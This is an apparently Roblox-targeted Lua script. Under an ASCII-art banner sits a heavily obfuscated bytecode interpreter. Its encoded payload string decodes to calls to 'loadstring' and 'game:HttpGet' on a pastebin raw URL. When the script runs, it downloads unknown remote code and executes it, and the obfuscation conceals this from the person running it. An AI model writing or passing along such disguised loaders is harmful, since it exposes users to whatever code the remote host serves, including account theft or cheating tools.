--[[░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░██▌░░░░▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░▐██░░░░▐██▌░░░░░░░░░▄▄░░░░░░░░░░░░░░░
░░░▐██░░░░███░░░░░░░░░░██▌░░░░░░░░░░░░░░
░░░▐███▄▄████░█████▌░░▐██▌░░░░░░░░░░░░░░
░░░░████████░██████▌░░███░░░░░░░░░░░░░░░
░░░░░░████░▄▄███▄██▌░░███▄█████░░░░░░░░░
░░░░░░███▌░████████░░░███████▀▀░░░░░░░░░
░░░░░███▌░░░░████▀░░░░███████░░░░░░░░░░░
░░░░███░░░░░░████▄▄▄▄░███░█████▄▄░░░░░░░
░░░░▀▀░░░░░░░░▀██████░███░░░▀████▌░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▀▀░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░▐██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░███░░░░░░░░░░░░░░░░░░░░░░▄▄░░░░░░░░░░
░░░██▌░░░░░░░░░░░░░░░░░░░░░▐██░░░░░░░░░░
░░░███▄▄▄░░░░░░▄▄░░░░░▄▄░░░▐██░░░░░░░░░░
░░░███████▌░░░▐██▌░░░▐██▌░░▐██▄███████▄░
░░░████▀███░░░▐██░░░░▐██▌░░███████▀█████
░░░███░░▐██░░░▐██░░░░███░░▐████▀░░░░░███
░░███▌░░▐██░░░▐███░░████░░████░░░░░░░░██
░░███░░░▐██░░░░███████████████▄░░░░░░███
░▐███░░░▐██░░░░░▀▀███▀░██████████▄██████
░░▀▀░░░░░░░░░░░░░░░░░░░░░░░░░░▀██████▀██
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0;local v32;while true do if (v31==1) then return v32;end if ((0 -0)==v31) then v32=v1(v16,v19,v19);v19=v19 + (2 -1) ;v31=1 -0 ;end end end v23=nil;function v23()local v33=0 -0 ;local v34;local v35;while true do if (v33==(619 -(555 + 64))) then v34,v35=v1(v16,v19,v19 + (933 -(135 + 722 + 74)) );v19=v19 + 2 ;v33=569 -(367 + 201) ;end if (v33==((1805 -(282 + 595)) -(214 + 713))) then return (v35 * (65 + 191)) + v34 ;end end end v18=3;end if (v18==4) then function v25()local v36=1637 -(1523 + 114) ;local v37;local v38;local v39;local v40;local v41;local v42;while true do if (v36==3) then if (v41==(0 + 0)) then if (v40==0) then return v42 * ((0 -0) -0) ;else v41=1;v39=1065 -(68 + 997) ;end elseif (v41==(3317 -(226 + 1044))) then return ((v40==(0 -0)) and (v42 * (1/0))) or (v42 * NaN) ;end return v8(v42,v41-(1140 -(19 + 13 + (111 -26))) ) * (v39 + (v40/((2 + 0)^(12 + 40)))) ;end if (v36==(958 -(892 + 65))) then v39=2 -1 ;v40=(v21(v38,1 -0 ,36 -16 ) * (((1539 -(1069 + 118)) -(87 + (596 -333)))^(212 -(67 + (247 -134))))) + v37 ;v36=2 + 0 ;end if (v36==(4 -2)) then v41=v21(v38,16 + 5 ,123 -92 );v42=((v21(v38,32)==((166 + 787) -(802 + 150))) and  -(2 -1)) or (1 -(0 -0)) ;v36=3;end if (v36==(0 + 0)) then v37=v24();v38=v24();v36=998 -(915 + 82) ;end end end v26=nil;function v26(v43)local v44;if  not v43 then local v72=0 + (442 -(416 + 26)) ;while true do if (v72==(791 -(368 + 423))) then v43=v24();if (v43==(0 -(0 -0))) then return "";end break;end end end v44=v3(v16,v19,(v19 + v43) -(19 -(10 + 8)) );v19=v19 + v43 ;local v45={};for v70=3 -2 , #v44 do v45[v70]=v2(v1(v3(v44,v70,v70)));end return v6(v45);end v18=5;end if (v18==6) then v29=nil;function v29()local v46=0 + 0 ;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v46==(4 -3)) then local v77=0 -0 ;while true do if (v77~=(1207 -(696 + 510))) then else v46=3 -1 ;break;end if ((1262 -(1091 + 171))==v77) then v49=nil;v50=nil;v77=1 + 0 ;end end end if (v46==(6 -4)) then local v78=0 -0 ;while true do if (v78==(374 -(123 + 251))) then v51=nil;v52=nil;v78=4 -3 ;end if (v78==(699 -(208 + 490))) then v46=3;break;end end end if (v46~=(0 + 0)) then else v47=0 + 0 ;v48=nil;v46=1;end if (v46~=(839 -(660 + 176))) then else v53=nil;while true do local v82=0 + 0 ;while true do if (v82==1) then if (v47==(202 -(14 + 188))) then v48={};v49={};v50={};v51={v48,v49,nil,v50};v47=1 -0 ;end break;end if (v82~=0) then else if (v47==(1 -0)) then local v107=0 -0 ;while true do if (v107==(0 + 0)) then local v115=0 + 0 ;while true do if (v115==(397 -(115 + 281))) then v107=2 -1 ;break;end if (v115~=0) then else v52=v24();v53={};v115=1;end end end if (v107~=(2 + 0)) then else v47=2;break;end if (1==v107) then for v117=1,v52 do local v118=0;local v119;local v120;local v121;local v122;while true do if (v118==2) then while true do if ((2 -1)==v119) then v122=nil;while true do if (v120==(0 -0)) then v121=v22();v122=nil;v120=1;end if (v120~=1) then else if (v121==1) then v122=v22()~=(867 -(550 + 317)) ;elseif (v121==2) then v122=v25();elseif (v121==3) then v122=v26();end v53[v117]=v122;break;end end break;end if (v119==0) then local v160=0 -0 ;while true do if (v160==(1 -0)) then v119=1;break;end if (v160==(0 -0)) then v120=285 -(134 + 151) ;v121=nil;v160=1666 -(970 + 695) ;end end end end break;end if (v118~=1) then else v121=nil;v122=nil;v118=3 -1 ;end if (0==v118) then v119=0;v120=nil;v118=1;end end end v51[1993 -(582 + 1408) ]=v22();v107=6 -4 ;end end end if (v47~=(2 -0)) then else for v108=1,v24() do local v109=0;local v110;local v111;local v112;while true do if (v109==0) then v110=0 -0 ;v111=nil;v109=1;end if (v109==(1825 -(1195 + 629))) then v112=nil;while true do if (v110==(0 -0)) then local v123=241 -(187 + 54) ;while true do if (v123==(781 -(162 + 618))) then v110=1 + 0 ;break;end if ((0 + 0)~=v123) then else v111=0 -0 ;v112=nil;v123=1;end end end if ((1 -0)==v110) then while true do if (v111~=(0 + 0)) then else v112=v22();if (v21(v112,1,1637 -(1373 + 263) )~=0) then else local v166=1000 -(451 + 549) ;local v167;local v168;local v169;while true do if (v166==(1 + 2)) then if (v21(v168,4 -1 ,3)==1) then v169[4]=v53[v169[6 -2 ]];end v48[v108]=v169;break;end if (v166==(1384 -(746 + 638))) then local v172=0;while true do if (v172==(0 + 0)) then v167=v21(v112,2 -0 ,3);v168=v21(v112,4,347 -(218 + 123) );v172=1582 -(1535 + 46) ;end if (v172~=1) then else v166=1 + 0 ;break;end end end if (1==v166) then local v173=0 + 0 ;while true do if (v173==(560 -(306 + 254))) then v169={v23(),v23(),nil,nil};if (v167==(0 -0)) then local v177=0;local v178;local v179;while true do if (v177==(1468 -(899 + 568))) then while true do if (v178~=0) then else v179=0 + 0 ;while true do if (v179==0) then v169[7 -4 ]=v23();v169[4]=v23();break;end end break;end end break;end if (v177~=(603 -(268 + 335))) then else v178=0;v179=nil;v177=1;end end elseif (v167==(291 -(60 + 230))) then v169[3]=v24();elseif (v167==2) then v169[3]=v24() -(2^16) ;elseif (v167~=(575 -(426 + 146))) then else local v186=0 + 0 ;local v187;while true do if (v186==(1456 -(282 + 1174))) then v187=0;while true do if (v187==(811 -(569 + 242))) then v169[3]=v24() -((5 -3)^(1 + 15)) ;v169[4]=v23();break;end end break;end end end v173=1;end if (v173==1) then v166=2;break;end end end if (v166~=(1026 -(706 + 318))) then else local v174=1251 -(721 + 530) ;while true do if (v174==0) then if (v21(v168,1,1)~=1) then else v169[1273 -(945 + 326) ]=v53[v169[4 -2 ]];end if (v21(v168,2,2 + 0 )==1) then v169[703 -(271 + 429) ]=v53[v169[3]];end v174=1 + 0 ;end if (v174==1) then v166=3;break;end end end end end break;end end break;end end break;end end end for v113=1501 -(1408 + 92) ,v24() do v49[v113-(1087 -(461 + 625)) ]=v29();end return v51;end v82=1289 -(993 + 295) ;end end end break;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54)if (v1(v54,2)==79) then v20=v0(v3(v54,1,1));return "";else local v73=v2(v0(v54,16));if v20 then local v83=0;local v84;while true do if (v83==1) then return v84;end if (v83==0) then v84=v5(v73,v20);v20=nil;v83=1;end end else return v73;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v55=0 + 0 ;local v56;local v57;local v58;local v59;while true do if (v55==(1171 -((1740 -(1249 + 73)) + 753))) then v56,v57,v58,v59=v1(v16,v19,v19 + 2 + 1 );v19=v19 + 1 + 2 + 1 ;v55=1;end if (v55==(1 + 0)) then return (v59 * (4240035 + 2977910 + 9559271)) + (v58 * ((67210 -(466 + 679)) -(406 + 123))) + (v57 * (2025 -(1749 + 20))) + v56 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v85=v64;local v86=v65;local v87=v66;local v88=v28;local v89=1;local v90= -1;local v91={};local v92={...};local v93=v12("#",...) -1 ;local v94={};local v95={};for v99=0,v93 do if (v99>=v87) then v91[v99-v87 ]=v92[v99 + 1 ];else v95[v99]=v92[v99 + 1 ];end end local v96=(v93-v87) + 1 ;local v97;local v98;while true do local v100=0;while true do if (v100==1) then if (v98<=7) then if (v98<=3) then if (v98<=1) then if (v98>0) then local v124=v97[2];local v125,v126=v88(v95[v124](v13(v95,v124 + 1 ,v97[3])));v90=(v126 + v124) -1 ;local v127=0;for v154=v124,v90 do v127=v127 + 1 ;v95[v154]=v125[v127];end else v95[v97[2]]=v97[3];end elseif (v98==2) then v95[v97[2]]=v97[3]~=0 ;else local v131=0;local v132;local v133;while true do if (v131==1) then v95[v132 + 1 ]=v133;v95[v132]=v133[v97[4]];break;end if (v131==0) then v132=v97[2];v133=v95[v97[3]];v131=1;end end end elseif (v98<=5) then if (v98==4) then v95[v97[2]]=v97[3];else v95[v97[2]]=v62[v97[3]];end elseif (v98==6) then v95[v97[2]]();else local v138=v97[2];local v139,v140=v88(v95[v138](v13(v95,v138 + 1 ,v97[3])));v90=(v140 + v138) -1 ;local v141=0;for v157=v138,v90 do v141=v141 + 1 ;v95[v157]=v139[v141];end end elseif (v98<=11) then if (v98<=9) then if (v98>8) then local v142=v97[2];v95[v142]=v95[v142](v13(v95,v142 + 1 ,v90));else local v144=v97[2];v95[v144]=v95[v144](v13(v95,v144 + 1 ,v90));end elseif (v98==10) then v95[v97[2]]=v62[v97[3]];else v95[v97[2]]=v97[3]~=0 ;end elseif (v98<=13) then if (v98==12) then do return;end else v95[v97[2]]();end elseif (v98==14) then local v149=v97[2];local v150=v95[v97[3]];v95[v149 + 1 ]=v150;v95[v149]=v150[v97[4]];else do return;end end v89=v89 + 1 ;break;end if (0==v100) then v97=v85[v89];v98=v97[1];v100=1;end end end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v67,v68,v69)if v69 then local v74=(v67/(2^(v68-(2 -1))))%((5 -(106 -(17 + 86)))^(((v69-(1901 -(106 + 1218 + 576))) -(v68-(1 + 0))) + 1 + (0 -0))) ;return v74-(v74%(2 -1)) ;else local v75=0 -(0 -0) ;local v76;while true do if (v75==(114 -(4 + 110))) then v76=(586 -(57 + (693 -(122 + 44))))^(v68-(1 -0)) ;return (((v67%(v76 + v76))>=v76) and (1428 -(41 + 1386))) or 0 ;end end end end v22=nil;v18=2;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F3358745A3133717400093O00120A3O00013O00120A000100023O00200E00010001000300122O000300044O0002000400014O0001000100044O00095O00022O000D3O000100012O000F3O00017O00",v9(),...);end
